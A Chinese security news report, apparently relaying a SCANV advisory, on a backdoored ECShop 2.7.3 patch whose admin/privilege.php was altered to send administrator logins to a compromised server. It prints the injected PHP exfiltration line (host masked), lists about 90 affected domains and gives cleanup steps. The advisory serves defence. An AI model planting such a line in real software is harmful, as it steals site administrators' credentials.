网络安全 频道

开源网店ECShop 补丁程序再遭感染

ECShop是很多站长喜欢用的网店程序,其V2.7.3版本用户甚众。

2013年5月,SCANV网站安全中心曾经响应过ECShop网店程序的后门事件,本以为此事已了,不料在近日,又有安全研究人员在漏洞平台Wooyun上发现了ECShop官方补丁的后门代码。

经SCANV网站安全研究人员分析发现,这一次的后门代码存在于一个编号为273utf8_patch006的历史补丁文件包中。骇客将补丁包里的(\admin\privilege.php)文件篡改后,插入了一段记录后台用户及密码等信息的代码,并发送到一个由黑客控制的服务器上。值得注意的是,SCANV安全研究人员在分析前两次补丁后门代码里并没有发现本次的后门代码,因此,本次后门事件可能发生在前两次篡改之前。

本次骇客植入的后门代码:

文件\admin\privilege.php代码113-114行:

@file_get_contents('http://[马赛

克]/api/manyou/ECShop/w2.php?username='.$_POST['username'].'&password='.$_POST['password'].'---'.$_SERVER['REMOTE_ADDR'].'---'.date('Y-m-d|H:i:s').'---'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']);

通过进一步分析发现“http://[马赛克]/”网站实际是被黑客入侵控制的网站(“肉鸡”),而且黑客用来收集密码等信息的文件目录还可以“历遍文件”,如图:

 

经过SCANV网站安全研究人员的下载并去重,发现大概有90个域名网站受影响。列表如下:

qq168.cn

www.yuexiubuy.com

www.189-139.com

web419798.dnsvhost.com

gmxieye.qumart.com

jessinskin.fei580.net

product.aegismax.com

www.sd52.com

www.qzsj.cn

www.aifuwang.net

www.hangzhougushi.com

www.wxbsy.com

shop.thlby.com

www.qibaoku.com

www.261p.com

huayichang.530599.com

www.woaizihua.com

hyw00691.chinaw3.com

www.coffeecti.com

www.530599.com

www.coropo.net

shop.piju.org.cn

weigesc.com

www.gpspai.com

ah.mingzui5.com

xj.mingzui5.com

shop.sinholi.com

7vgo.com

www.ixngo.com

www.degou8.com

puluo.com

shop.tanggu365.com

www.zhimeii.com

www.newbuy100.com

www.wanyiwan.net

www.zhuoyuejia.com

www.knightlee.com

www.yu-yuan.net

www.metao.cn

www.onin.cn

shop.snh48.com

willis.bgp.gggppp.com

w260560.s127-204.myverydz.com

boteli.web-186.com

daidaigua.cn

www.hengshantang.com

lzcxd001.site520.com

www.027tel.com

www.mall521.com

ly751008.web-212.com

forECShop.vhost1061.dns345.cn

hangzhougushi.com

www.liangdian8.cn

www.bieshiba.com

www.zfdn.com

www.51dcxc.com

www.007jtw.com

0794daogou.com

a119.usa.123450.net

www.ehaohuo.com

www.rmik.cn

w263072.s114-5.myverydz.com

www.tcbld.com

www.ypgww.com

www.bsww.cn

www.anoye.net

www.0393buy.com

www.gcebuy.com

www.baibaoj.com

www.gzmeijiu.com

www.xsbl.org

www.maidongkj.com

www.ECShoptop.com

360sowo.com

www.fujiuwang.com

www.52taidi.cn

www.858tuan.com

www.kebiai.cn

www.qdhaosail.cn

121.11.65.175:8085

www.guowee.com

5239.vicp.net

testshop.snh48.com

www.zhengpincu.com

bbs.zhengpincu.com

shop.huaxuehui.com

www.xaaf.cn

www.fanfan7.com

www.weiaiyi.com

117.34.74.168

www.xn--2-oj2bn60a.com

SCANV网站安全研究中心推荐的解决方案:

1、使用ecshoop的站长朋友,核对上面公布的域名,并查看文件\admin\privilege.php内容,搜索关键词“w2.php”。如果找到上面提到的恶意代码,请直接删除后保存。

2、修改所有拥有后台权限的用户的密码,并通知网站所有用户修改密码。

3、复查网站及服务器的安全状况。

目前,官方已在6月3日发布新的补丁包

(http://bbs.ECShop.com/thread-1130889-1-1.html),请站长及时检查修复。

SCANV网站安全中心在此提醒广大站长,为自己Web程序下载补丁文件时一定要做相应的检查,哪怕该补丁文件是从官方网站上下载的,也有可能感染恶意后门。正在使用该网店程序的站长可登录:http://www.scanv.com/tools/#ECShop给自己的ECShop站点做个安全检测,平时可经常登录SCANV网站安全中心,以便第一时间了解自己网站的安全情况。

特别提醒:本网信息来自于互联网,目的在于传递更多信息,并不代表本网赞同其观点。其原创性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺,并请自行核实相关内容。本站不承担此类作品侵权行为的直接责任及连带责任。如若本网有任何内容侵犯您的权益,请及时联系我们,本站将会在24小时内处理完毕。
0
相关文章